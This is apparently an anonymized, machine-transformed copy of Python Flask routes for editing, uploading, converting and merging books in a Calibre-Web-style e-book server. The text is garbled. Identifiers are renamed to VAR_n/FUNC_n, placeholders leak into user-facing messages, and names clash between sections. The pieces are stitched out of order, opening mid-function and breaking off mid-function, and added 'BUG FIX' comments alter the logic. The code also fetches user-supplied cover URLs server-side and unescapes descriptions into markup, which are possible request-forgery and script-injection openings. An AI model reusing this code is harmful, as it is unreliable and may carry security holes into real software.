            VAR_48 |= FUNC_7(VAR_57,
                             getattr(VAR_17, VAR_31),
                             db.cc_classes[VAR_29.id],
                             calibre_db.session,
                             'custom')
    return VAR_48
def FUNC_25(VAR_32, VAR_17, VAR_15):
    """Handle the "add format" file upload from the edit-book page.

    Validates permission and extension, stores the file next to the book,
    registers a db.Data row and queues an upload notification.  Returns the
    uploader's metadata on success, a redirect Response on failure, or None
    when no file was submitted.
    """
    if 'btn-VAR_26-format' in VAR_32.files:
        VAR_40 = VAR_32.files['btn-VAR_26-format']
        if VAR_40.filename != '':
            if not current_user.role_upload():
                abort(403)
            if '.' in VAR_40.filename:
                VAR_96 = VAR_40.filename.rsplit('.', 1)[-1].lower()
                if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
                    flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=VAR_96),
                          category="error")
                    return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            else:
                flash(_('File to be uploaded must have an extension'), category="error")
                return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            VAR_106 = VAR_17.path.rsplit('/', 1)[-1]
            VAR_107 = os.path.normpath(os.path.join(config.config_calibre_dir, VAR_17.path))
            VAR_108 = os.path.join(VAR_107, VAR_106 + '.' + VAR_96)
            if not os.path.exists(VAR_107):
                try:
                    os.makedirs(VAR_107)
                except OSError:
                    flash(_(u"Failed to create VAR_72 %(path)s (Permission denied).", VAR_72=VAR_107), category="error")
                    return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            try:
                VAR_40.save(VAR_108)
            except OSError:
                flash(_(u"Failed to store file %(file)s.", file=VAR_108), category="error")
                return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            VAR_73 = os.path.getsize(VAR_108)
            VAR_109 = calibre_db.get_book_format(VAR_15, VAR_96.upper())
            if VAR_109:
                # format already registered: keep the freshly saved file,
                # just skip creating a duplicate db.Data row
                VAR_2.warning('Book format %s already existing', VAR_96.upper())
            else:
                try:
                    VAR_119 = db.Data(VAR_15, VAR_96.upper(), VAR_73, VAR_106)
                    calibre_db.session.add(VAR_119)
                    calibre_db.session.commit()
                    calibre_db.update_title_sort(config)
                except (OperationalError, IntegrityError) as e:
                    calibre_db.session.rollback()
                    VAR_2.error('Database VAR_49: %s', e)
                    flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
                    return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            VAR_110=_(u"File format %(ext)s added to %(VAR_17)s", ext=VAR_96.upper(), VAR_17=VAR_17.title)
            WorkerThread.add(current_user.name, TaskUpload(
                "<a href=\"" + url_for('web.show_book', VAR_15=VAR_17.id) + "\">" + VAR_110 + "</a>"))
            return uploader.process(
                VAR_108, *os.path.splitext(VAR_40.filename),
                rarExecutable=config.config_rarfile_location)
def FUNC_26(VAR_32, VAR_17):
    """Store an uploaded cover image for book VAR_17.

    Returns True on success, False (with a flashed error) on failure, and
    None when the request carried no cover file.
    """
    if 'btn-VAR_26-cover' not in VAR_32.files:
        return None
    cover_file = VAR_32.files['btn-VAR_26-cover']
    if cover_file.filename == '':
        return None
    if not current_user.role_upload():
        abort(403)
    saved, message = helper.save_cover(cover_file, VAR_17.path)
    if saved is True:
        return True
    flash(message, category="error")
    return False
def FUNC_27(VAR_17, VAR_33):
    """Apply the new title VAR_33 to book VAR_17.

    Whitespace is trimmed; an empty title is replaced by the localized
    'Unknown'.  Returns True when the title changed, False otherwise.
    """
    # BUG FIX: original read the undefined name `book_title` (NameError);
    # it must normalize the VAR_33 parameter instead.
    VAR_33 = VAR_33.rstrip().strip()
    if VAR_17.title != VAR_33:
        if VAR_33 == '':
            VAR_33 = _(u'Unknown')
        VAR_17.title = VAR_33
        return True
    return False
def FUNC_28(VAR_17, VAR_34, VAR_35=True):
    """Apply the '&'-separated author string VAR_34 to book VAR_17.

    Commas inside a single author name are stored as '|'.  When VAR_35 is
    True the book's author_sort is also refreshed.  Returns the list of
    author names and a changed flag.
    """
    VAR_62 = VAR_34.split('&')
    VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
    VAR_62 = helper.uniq(VAR_62)
    if VAR_62 == ['']:
        VAR_62 = [_(u'Unknown')]  # prevent empty Author
    VAR_63 = FUNC_7(VAR_62, VAR_17.authors, db.Authors, calibre_db.session, 'author')
    # build the sort string, preferring the sort value already stored in the DB
    VAR_64 = list()
    for inp in VAR_62:
        VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not VAR_89:
            VAR_89 = helper.get_sorted_author(inp)
        else:
            VAR_89 = VAR_89.sort
        VAR_64.append(helper.get_sorted_author(VAR_89))
    VAR_65 = ' & '.join(VAR_64)
    if VAR_17.author_sort != VAR_65 and VAR_35:
        VAR_17.author_sort = VAR_65
        VAR_63 = True
    return VAR_62, VAR_63
@VAR_1.route("/admin/VAR_17/<int:VAR_15>", methods=['GET', 'POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_29(VAR_15):
    """Edit-book route: GET renders the edit form, POST applies all changes.

    Delegates field handling to the FUNC_1x helpers, moves files on disk via
    helper.update_dir_stucture and commits (or rolls back) the DB session.
    """
    VAR_39 = False
    try:
        calibre_db.update_title_sort(config)
    except sqliteOperationalError as e:
        VAR_2.debug_or_exception(e)
        calibre_db.session.rollback()
    if VAR_32.method != 'POST':
        return FUNC_14(VAR_15)
    VAR_17 = calibre_db.get_filtered_book(VAR_15, allow_show_archived=True)
    if not VAR_17:
        flash(_(u"Oops! Selected VAR_17 VAR_37 is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    # optional new-format upload and cover upload are handled first
    VAR_36 = FUNC_25(VAR_32, VAR_17, VAR_15)
    if FUNC_26(VAR_32, VAR_17) is True:
        VAR_17.has_cover = 1
        VAR_39 = True
    try:
        VAR_20 = VAR_32.form.to_dict()
        FUNC_30(VAR_20, VAR_36)
        VAR_90 = None
        VAR_91 = FUNC_27(VAR_17, VAR_20["book_title"])
        VAR_62, VAR_92 = FUNC_28(VAR_17, VAR_20["author_name"])
        if VAR_92 or VAR_91:
            # title/author changes require renaming the book folder
            VAR_90 = VAR_17.id
            VAR_39 = True
        if config.config_use_google_drive:
            gdriveutils.updateGdriveCalibreFromLocal()
        VAR_49 = False
        if VAR_90:
            VAR_49 = helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
        if not VAR_49:
            if "cover_url" in VAR_20:
                if VAR_20["cover_url"]:
                    if not current_user.role_upload():
                        return "", (403)
                    if VAR_20["cover_url"].endswith('/static/generic_cover.jpg'):
                        VAR_17.has_cover = 0
                    else:
                        VAR_68, VAR_49 = helper.save_cover_from_url(VAR_20["cover_url"], VAR_17.path)
                        if VAR_68 is True:
                            VAR_17.has_cover = 1
                            VAR_39 = True
                        else:
                            flash(VAR_49, category="error")
            VAR_39 |= FUNC_18(VAR_20["series_index"], VAR_17)
            VAR_39 |= FUNC_19(Markup(VAR_20['description']).unescape(), VAR_17)
            VAR_13 = FUNC_31(VAR_20, VAR_17)
            VAR_112, VAR_19 = FUNC_8(VAR_13, VAR_17.identifiers, calibre_db.session)
            if VAR_19:
                flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
            VAR_39 |= VAR_112
            VAR_39 |= FUNC_16(VAR_20['tags'], VAR_17)
            VAR_39 |= FUNC_17(VAR_20["series"], VAR_17)
            VAR_39 |= FUNC_21(VAR_20['publisher'], VAR_17)
            VAR_39 |= FUNC_20(VAR_20['languages'], VAR_17)
            VAR_39 |= FUNC_15(VAR_20, VAR_17)
            VAR_39 |= FUNC_24(VAR_15, VAR_17, VAR_20)
            if VAR_20["pubdate"]:
                try:
                    VAR_17.pubdate = datetime.strptime(VAR_20["pubdate"], "%Y-%m-%d")
                except ValueError:
                    VAR_17.pubdate = db.Books.DEFAULT_PUBDATE
            else:
                VAR_17.pubdate = db.Books.DEFAULT_PUBDATE
            if VAR_39:
                VAR_17.last_modified = datetime.utcnow()
            calibre_db.session.merge(VAR_17)
            calibre_db.session.commit()
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            if "detail_view" in VAR_20:
                return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
            else:
                flash(_("Metadata successfully updated"), category="success")
                return FUNC_14(VAR_15)
        else:
            # the on-disk rename failed: discard the DB changes as well
            calibre_db.session.rollback()
            flash(VAR_49, category="error")
            return FUNC_14(VAR_15)
    except Exception as ex:
        VAR_2.debug_or_exception(ex)
        calibre_db.session.rollback()
        flash(_("Error editing VAR_17, please check logfile for details"), category="error")
        return redirect(url_for('web.show_book', VAR_15=VAR_17.id))
def FUNC_30(VAR_20, VAR_36):
    """Fill empty form fields in VAR_20 with metadata extracted from the
    uploaded file (VAR_36); 'Unknown' placeholders are treated as empty."""
    if VAR_20['author_name'] == _(u'Unknown'):
        VAR_20['author_name'] = ''
    if VAR_20['book_title'] == _(u'Unknown'):
        VAR_20['book_title'] = ''
    for VAR_93, m_field in [
            ('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
            ('series_index', 'series_id'), ('languages', 'languages'),
            ('book_title', 'title')]:
        # form value wins; fall back to the extracted metadata attribute
        VAR_20[VAR_93] = VAR_20[VAR_93] or getattr(VAR_36, m_field, '')
    VAR_20["description"] = VAR_20["description"] or Markup(
        getattr(VAR_36, 'description', '')).unescape()
def FUNC_31(VAR_20, VAR_17):
    """Collect db.Identifiers rows from paired form fields.

    The edit form encodes identifiers as 'identifier-type-<n>' /
    'identifier-val-<n>' pairs; unmatched type fields are skipped.
    """
    type_prefix = 'identifier-type-'
    value_prefix = 'identifier-val-'
    identifiers = []
    for field_name, id_type in VAR_20.items():
        if not field_name.startswith(type_prefix):
            continue
        value_field = value_prefix + field_name[len(type_prefix):]
        if value_field in VAR_20:
            identifiers.append(db.Identifiers(VAR_20[value_field], id_type, VAR_17.id))
    return identifiers
def FUNC_32(VAR_37, VAR_38):
    """Prepare author data for an uploaded book with title VAR_37 and
    '&'-separated author string VAR_38.

    Warns when a book with the same title/author seems to exist already.
    Returns (author_sort_string, author_name_list, first_author_db_row);
    the first author is created in the DB if missing.
    """
    if VAR_37 != _(u'Unknown') and VAR_38 != _(u'Unknown'):
        VAR_95 = calibre_db.check_exists_book(VAR_38, VAR_37)
        if VAR_95:
            VAR_2.info("Uploaded VAR_17 probably exists in library")
            # BUG FIX: original passed the undefined name `entry` here
            flash(_(u"Uploaded VAR_17 probably exists in the library, consider to VAR_63 before VAR_26 new: ")
                  + Markup(render_title_template('book_exists_flash.html', VAR_95=VAR_95)), category="warning")
    VAR_62 = VAR_38.split('&')
    VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
    VAR_62 = helper.uniq(VAR_62)
    if VAR_62 == ['']:
        VAR_62 = [_(u'Unknown')]  # prevent empty Author
    VAR_64 = list()
    VAR_69 = None
    for inp in VAR_62:
        VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not VAR_89:
            if not VAR_69:
                # BUG FIX: original assigned to the undefined `db_author`,
                # then added/returned VAR_69 which stayed None
                VAR_69 = db.Authors(inp, helper.get_sorted_author(inp), "")
                calibre_db.session.add(VAR_69)
                calibre_db.session.commit()
            VAR_113 = helper.get_sorted_author(inp)
        else:
            if not VAR_69:
                # BUG FIX: same renaming defect as above
                VAR_69 = VAR_89
            VAR_113 = VAR_89.sort
        VAR_64.append(VAR_113)
    VAR_65 = ' & '.join(VAR_64)
    return VAR_65, VAR_62, VAR_69
def FUNC_33(VAR_39, VAR_36):
    """Create the db.Books record (plus relations and a db.Data row) for the
    uploaded file described by metadata VAR_36.

    Returns (book_row, author_name_list, title_dir_name).  The session is
    flushed but not committed here.
    """
    VAR_37 = VAR_36.title
    VAR_38 = VAR_36.author
    VAR_65, VAR_62, VAR_69 = FUNC_32(VAR_37, VAR_38)
    VAR_70 = helper.get_valid_filename(VAR_37)
    VAR_71 = helper.get_valid_filename(VAR_69.name)
    # library-relative book path, always with forward slashes
    VAR_72 = os.path.join(VAR_71, VAR_70).replace('\\', '/')
    VAR_41 = db.Books(VAR_37, "", VAR_65, datetime.utcnow(), datetime(101, 1, 1),
                      '1', datetime.utcnow(), VAR_72, VAR_36.cover, VAR_69, [], "")
    VAR_39 |= FUNC_7(VAR_62, VAR_41.authors, db.Authors, calibre_db.session,
                     'author')
    VAR_39 |= FUNC_18(VAR_36.series_id, VAR_41)
    VAR_39 |= FUNC_20(VAR_36.languages, VAR_41, VAR_26=True)
    VAR_39 |= FUNC_16(VAR_36.tags, VAR_41)
    VAR_39 |= FUNC_21(VAR_36.publisher, VAR_41)
    VAR_39 |= FUNC_17(VAR_36.series, VAR_41)
    VAR_73 = os.path.getsize(VAR_36.file_path)
    VAR_74 = db.Data(VAR_41, VAR_36.extension.upper()[1:], VAR_73, VAR_70)
    VAR_41.data.append(VAR_74)
    calibre_db.session.add(VAR_41)
    # flush so the new book gets its id before the caller continues
    calibre_db.session.flush()
    return VAR_41, VAR_62, VAR_70
def FUNC_34(VAR_40):
    """Validate an uploaded file's extension and hand it to the uploader.

    Returns (metadata, None) on success or (None, json_redirect_response)
    when validation or the temp-dir save fails.
    """
    if '.' in VAR_40.filename:
        VAR_96 = VAR_40.filename.rsplit('.', 1)[-1].lower()
        # '' in EXTENSIONS_UPLOAD means "allow everything"
        if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
            flash(
                _("File extension '%(ext)s' is not allowed to be uploaded to this server",
                  ext=VAR_96), category="error")
            return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    else:
        flash(_('File to be uploaded must have an extension'), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    try:
        VAR_36 = uploader.upload(VAR_40, config.config_rarfile_location)
    except (IOError, OSError):
        VAR_2.error("File %s could not saved to temp dir", VAR_40.filename)
        flash(_(u"File %(filename)s could not saved to temp dir",
                filename=VAR_40.filename), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    return VAR_36, None
def FUNC_35(VAR_36, VAR_41):
    """Move the extracted cover (or the generic placeholder) into the new
    book's folder as cover.jpg; failures are flashed, not raised."""
    if VAR_36.cover:
        VAR_97 = VAR_36.cover
    else:
        VAR_97 = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
    VAR_75 = os.path.join(config.config_calibre_dir, VAR_41.path, "cover.jpg")
    try:
        copyfile(VAR_97, VAR_75)
        if VAR_36.cover:
            # remove the temp cover only after a successful copy
            os.unlink(VAR_36.cover)
    except OSError as e:
        VAR_2.error("Failed to move cover file %s: %s", VAR_75, e)
        flash(_(u"Failed to Move Cover File %(file)s: %(VAR_49)s", file=VAR_75,
                VAR_49=e),
              category="error")
@VAR_1.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@FUNC_0
def VAR_26():
    """Upload route: store each submitted file as a new book.

    Creates the DB records, moves the file and cover into the library and
    returns a JSON redirect target; single uploads go straight to the book's
    edit/detail page.
    """
    if not config.config_uploading:
        abort(404)
    if VAR_32.method == 'POST' and 'btn-upload' in VAR_32.files:
        for VAR_40 in VAR_32.files.getlist("btn-upload"):
            try:
                VAR_39 = False
                calibre_db.update_title_sort(config)
                # register uuid4() for the DB trigger creating book uuids
                calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
                VAR_36, VAR_49 = FUNC_34(VAR_40)
                if VAR_49:
                    return VAR_49
                VAR_41, VAR_62, VAR_70 = FUNC_33(VAR_39, VAR_36)
                VAR_39 |= FUNC_19(Markup(VAR_36.description).unescape(), VAR_41)
                VAR_15 = VAR_41.id
                VAR_37 = VAR_41.title
                VAR_49 = helper.update_dir_structure_file(VAR_15,
                                                          config.config_calibre_dir,
                                                          VAR_62[0],
                                                          VAR_36.file_path,
                                                          VAR_70 + VAR_36.extension.lower())
                FUNC_35(VAR_36, VAR_41)
                calibre_db.session.commit()
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
                if VAR_49:
                    flash(VAR_49, category="error")
                VAR_110 = _(u"File %(file)s uploaded", file=VAR_37)
                # BUG FIX: the three references below used the undefined name
                # `book_id`; the new book's id is VAR_15.
                WorkerThread.add(current_user.name, TaskUpload(
                    "<a href=\"" + url_for('web.show_book', VAR_15=VAR_15) + "\">" + VAR_110 + "</a>"))
                if len(VAR_32.files.getlist("btn-upload")) < 2:
                    if current_user.role_edit() or current_user.role_admin():
                        VAR_120 = {"location": url_for('editbook.edit_book', VAR_15=VAR_15)}
                        return Response(json.dumps(VAR_120), mimetype='application/json')
                    else:
                        VAR_120 = {"location": url_for('web.show_book', VAR_15=VAR_15)}
                        return Response(json.dumps(VAR_120), mimetype='application/json')
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                VAR_2.error("Database VAR_49: %s", e)
                flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
    return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@VAR_1.route("/admin/VAR_17/convert/<int:VAR_15>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_37(VAR_15):
    """Queue a format conversion for book VAR_15 and redirect back to the
    edit page; source/target formats come from the posted form."""
    VAR_76 = VAR_32.form.get('book_format_from', None)
    VAR_77 = VAR_32.form.get('book_format_to', None)
    if (VAR_76 is None) or (VAR_77 is None):
        flash(_(u"Source or destination format for conversion missing"), category="error")
        # BUG FIX: redirects used the undefined name `book_id`; the route
        # parameter is VAR_15.
        return redirect(url_for('editbook.edit_book', VAR_15=VAR_15))
    VAR_2.info('converting: VAR_17 id: %s from: %s to: %s', VAR_15, VAR_76, VAR_77)
    VAR_78 = helper.convert_book_format(VAR_15, config.config_calibre_dir, VAR_76.upper(),
                                        VAR_77.upper(), current_user.name)
    if VAR_78 is None:
        flash(_(u"Book successfully queued for converting to %(VAR_16)s",
                VAR_16=VAR_77),
              category="success")
    else:
        flash(_(u"There was an VAR_49 converting this VAR_17: %(res)s", res=VAR_78), category="error")
    return redirect(url_for('editbook.edit_book', VAR_15=VAR_15))
@VAR_1.route("/scholarsearch/<VAR_42>", methods=['GET'])
@login_required_if_no_ano
@FUNC_1
def FUNC_38(VAR_42):
    """Search Google Scholar for the '+'-separated query VAR_42 and return
    at most ten publications as JSON ("[]" when scholarly is unavailable)."""
    if not VAR_0:
        return "[]"
    publications = scholarly.search_pubs(' '.join(VAR_42.split('+')))
    results = []
    for publication in publications:
        del publication['source']
        results.append(publication)
        if len(results) >= 10:
            break
    return Response(json.dumps(results), mimetype='application/json')
@VAR_1.route("/ajax/editbooks/<VAR_43>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_39(VAR_43):
    """Inline (books-table) edit endpoint: VAR_43 names the edited column,
    the posted form carries the book id ('pk') and the new 'value'.

    Returns a JSON response with the stored value, then commits.
    """
    VAR_79 = VAR_32.form.to_dict()
    VAR_17 = calibre_db.get_book(VAR_79['pk'])
    VAR_80 = ""
    if VAR_43 == 'series_index':
        FUNC_18(VAR_79['value'], VAR_17)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.series_index}), mimetype='application/json')
    elif VAR_43 == 'tags':
        FUNC_16(VAR_79['value'], VAR_17)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in VAR_17.tags])}),
                          mimetype='application/json')
    elif VAR_43 == 'series':
        FUNC_17(VAR_79['value'], VAR_17)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in VAR_17.series])}),
                          mimetype='application/json')
    elif VAR_43 == 'publishers':
        FUNC_21(VAR_79['value'], VAR_17)
        VAR_80 = Response(json.dumps({'success': True,
                                      'newValue': ', '.join([VAR_86.name for VAR_86 in VAR_17.publishers])}),
                          mimetype='application/json')
    elif VAR_43 == 'languages':
        VAR_27 = list()
        # BUG FIX: original passed the undefined name `invalid`; the
        # collector list is VAR_27.
        FUNC_20(VAR_79['value'], VAR_17, VAR_27=VAR_27)
        if VAR_27:
            VAR_80 = Response(json.dumps({'success': False,
                                          'msg': 'Invalid VAR_25 in VAR_32: {}'.format(','.join(VAR_27))}),
                              mimetype='application/json')
        else:
            VAR_121 = list()
            for lang in VAR_17.languages:
                try:
                    VAR_121.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
                except UnknownLocaleError:
                    VAR_121.append(_(isoLanguages.get(part3=lang.lang_code).name))
            VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join(VAR_121)}),
                              mimetype='application/json')
    elif VAR_43 == 'author_sort':
        VAR_17.author_sort = VAR_79['value']
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.author_sort}),
                          mimetype='application/json')
    elif VAR_43 == 'title':
        VAR_124 = VAR_17.sort
        FUNC_27(VAR_17, VAR_79.get('value', ""))
        helper.update_dir_stucture(VAR_17.id, config.config_calibre_dir)
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.title}),
                          mimetype='application/json')
    elif VAR_43 == 'sort':
        VAR_17.sort = VAR_79['value']
        VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_17.sort}),
                          mimetype='application/json')
    elif VAR_43 == 'authors':
        VAR_62, VAR_125 = FUNC_28(VAR_17, VAR_79['value'], VAR_79.get('checkA', None) == "true")
        helper.update_dir_stucture(VAR_17.id, config.config_calibre_dir, VAR_62[0])
        VAR_80 = Response(json.dumps({'success': True,
                                      'newValue': ' & '.join([author.replace('|', ',') for author in VAR_62])}),
                          mimetype='application/json')
    VAR_17.last_modified = datetime.utcnow()
    try:
        calibre_db.session.commit()
        # 'checkT' == "false" means "keep the old title sort" — restore it
        # after the first commit refreshed it.
        if VAR_43 == 'title' and VAR_79.get('checkT') == "false":
            VAR_17.sort = VAR_124
            calibre_db.session.commit()
    except (OperationalError, IntegrityError) as e:
        calibre_db.session.rollback()
        VAR_2.error("Database VAR_49: %s", e)
    return VAR_80
@VAR_1.route("/ajax/sort_value/<VAR_44>/<int:VAR_45>")
@login_required
def FUNC_40(VAR_44, VAR_45):
    """Return the sort value belonging to field VAR_44 of book VAR_45 as
    JSON; empty string for unknown fields or missing books."""
    if VAR_44 in ['title', 'authors', 'sort', 'author_sort']:
        VAR_17 = calibre_db.get_filtered_book(VAR_45)
        if VAR_17:
            if VAR_44 == 'title':
                return json.dumps({'sort': VAR_17.sort})
            elif VAR_44 == 'authors':
                return json.dumps({'author_sort': VAR_17.author_sort})
            if VAR_44 == 'sort':
                return json.dumps({'sort': VAR_17.title})
            if VAR_44 == 'author_sort':
                return json.dumps({'author_sort': VAR_17.author})
    return ""
@VAR_1.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@FUNC_1
def FUNC_41():
    """Preview a merge: report the target book's title and the titles of all
    books that would be merged into it."""
    VAR_79 = VAR_32.get_json().get('Merge_books')
    if VAR_79:
        VAR_100 = calibre_db.get_book(VAR_79[0]).title
        VAR_79.pop(0)
        if VAR_100:
            # BUG FIX: the list was re-created inside the loop, so only the
            # last source book's title survived; initialize it once.
            VAR_118 = []
            for VAR_15 in VAR_79:
                VAR_118.append(calibre_db.get_book(VAR_15).title)
            return json.dumps({'to': VAR_100, 'from': VAR_118})
    return ""
@VAR_1.route("/ajax/mergebooks", methods=['POST'])
@login_required
@FUNC_1
def FUNC_42():
    """Merge books: copy every format the target book lacks from each source
    book into the target's folder, register it, then delete the source."""
    VAR_79 = VAR_32.get_json().get('Merge_books')
    VAR_81 = list()
    if VAR_79:
        VAR_100 = calibre_db.get_book(VAR_79[0])
        VAR_79.pop(0)
        if VAR_100:
            # formats the target already has — these are never overwritten
            for file in VAR_100.data:
                VAR_81.append(file.format)
            VAR_114 = helper.get_valid_filename(VAR_100.title) + ' - ' + \
                      helper.get_valid_filename(VAR_100.authors[0].name)
            for VAR_15 in VAR_79:
                VAR_118 = calibre_db.get_book(VAR_15)
                if VAR_118:
                    for element in VAR_118.data:
                        if element.format not in VAR_81:
                            # copy the physical file into the target folder
                            VAR_122 = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                    VAR_100.path,
                                                                    VAR_114 + "." + element.format.lower()))
                            VAR_123 = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                    VAR_118.path,
                                                                    element.name + "." + element.format.lower()))
                            copyfile(VAR_123, VAR_122)
                            VAR_100.data.append(db.Data(VAR_100.id,
                                                        element.format,
                                                        element.uncompressed_size,
                                                        VAR_114))
                    # remove the source book entirely after copying
                    FUNC_13(VAR_118.id,"", True)
            return json.dumps({'success': True})
    return ""
@VAR_1.route("/ajax/xchange", methods=['POST'])
@login_required
@FUNC_1
def FUNC_43():
    """Swap title and authors for every book id in the posted 'xchange'
    list, renaming folders and committing per book."""
    VAR_79 = VAR_32.get_json().get('xchange')
    if VAR_79:
        for val in VAR_79:
            VAR_39 = False
            # BUG FIX: VAR_90 was only assigned when something changed but
            # read unconditionally below, raising NameError otherwise.
            VAR_90 = None
            VAR_17 = calibre_db.get_book(val)
            VAR_115 = VAR_17.title
            VAR_116 = calibre_db.order_authors(VAR_17)
            VAR_53 = []
            for VAR_38 in VAR_116.authors:
                VAR_53.append(VAR_38.name.replace('|', ','))
            # swap: the joined author names become the title and vice versa
            VAR_91 = FUNC_27(VAR_17, " ".join(VAR_53))
            VAR_62, VAR_92 = FUNC_28(VAR_17, VAR_115)
            if VAR_92 or VAR_91:
                VAR_90 = VAR_17.id
                VAR_39 = True
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
            if VAR_90:
                helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
            if VAR_39:
                VAR_17.last_modified = datetime.utcnow()
            try:
                calibre_db.session.commit()
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                VAR_2.error("Database VAR_49: %s", e)
                return json.dumps({'success': False})
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
        return json.dumps({'success': True})
    return ""
|
from __future__ import division, print_function, unicode_literals

import json
import os
from datetime import datetime
from shutil import copyfile
from sqlite3 import OperationalError as sqliteOperationalError
from uuid import uuid4

from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, VAR_31, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import current_user, login_required
from lxml.html.clean import clean_html
from sqlalchemy.exc import OperationalError, IntegrityError

try:
    from scholarly import scholarly
    VAR_45 = True
except ImportError:
    VAR_45 = False

from . import constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import config, get_locale, ub, db
from . import calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import login_required_if_no_ano

try:
    from functools import wraps
except ImportError:
    pass  # We're not using Python 3
VAR_0 = Blueprint('editbook', __name__)
VAR_1 = logger.create()
def FUNC_0(VAR_2):
    """Decorator: allow the wrapped view only for users with upload or admin
    rights; everyone else gets HTTP 403."""
    @wraps(VAR_2)
    def FUNC_44(*VAR_46, **VAR_47):
        if current_user.role_upload() or current_user.role_admin():
            return VAR_2(*VAR_46, **VAR_47)
        abort(403)
    return FUNC_44
def FUNC_1(VAR_2):
    """Decorator: allow the wrapped view only for users with edit or admin
    rights; everyone else gets HTTP 403."""
    @wraps(VAR_2)
    def FUNC_44(*VAR_46, **VAR_47):
        if current_user.role_edit() or current_user.role_admin():
            return VAR_2(*VAR_46, **VAR_47)
        abort(403)
    return FUNC_44
def FUNC_2(VAR_3, VAR_4, VAR_5):
    """Return the elements of VAR_3 whose key is absent from the input list
    VAR_5, compared case-insensitively.

    VAR_4 selects the key attribute: 'languages' → lang_code,
    'custom' → value, anything else → name.
    """
    def element_key(element):
        if VAR_4 == 'languages':
            return element.lang_code
        if VAR_4 == 'custom':
            return element.value
        return element.name

    wanted = {entry.lower() for entry in VAR_5}
    return [element for element in VAR_3 if element_key(element).lower() not in wanted]
def FUNC_3(VAR_3, VAR_4, VAR_5):
    """Return the entries of VAR_5 that have no exact-match counterpart in
    the database objects VAR_3.

    Unlike FUNC_2 the comparison here is case-sensitive.  VAR_4 selects the
    key attribute: 'languages' → lang_code, 'custom' → value, else → name.
    """
    def element_key(element):
        if VAR_4 == 'languages':
            return element.lang_code
        if VAR_4 == 'custom':
            return element.value
        return element.name

    existing = [element_key(element) for element in VAR_3]
    return [entry for entry in VAR_5 if entry not in existing]
def FUNC_4(VAR_3, VAR_6, VAR_7):
    """Detach every element of VAR_7 from the book relation VAR_3 and delete
    it from session VAR_6 when no book references it anymore.

    Returns True when anything was removed.
    """
    changed = False
    for obsolete in VAR_7:
        VAR_3.remove(obsolete)
        changed = True
        if len(obsolete.books) == 0:
            VAR_6.delete(obsolete)
    return changed
def FUNC_5(VAR_3, VAR_8, VAR_6, VAR_4, VAR_9):
    """Link each name in VAR_9 to the book relation VAR_3, creating rows of
    class VAR_8 in session VAR_6 when missing.

    VAR_4 ('author'/'series'/'custom'/'publisher'/tag-or-language) selects
    both the lookup column and the constructor signature.  Returns True when
    anything changed.
    """
    VAR_48 = False
    # the SQLAlchemy column used for the existence lookup
    if VAR_4 == 'languages':
        VAR_83 = VAR_8.lang_code
    elif VAR_4 == 'custom':
        VAR_83 = VAR_8.value
    else:
        VAR_83 = VAR_8.name
    for VAR_11 in VAR_9:
        VAR_10 = VAR_6.query(VAR_8).filter(VAR_83 == VAR_11).first()
        if VAR_4 == 'author':
            VAR_102 = VAR_8(VAR_11, helper.get_sorted_author(VAR_11.replace('|', ',')), "")
        elif VAR_4 == 'series':
            # BUG FIX: original passed the undefined name `add_element` as
            # the sort value; series sort by their own name.
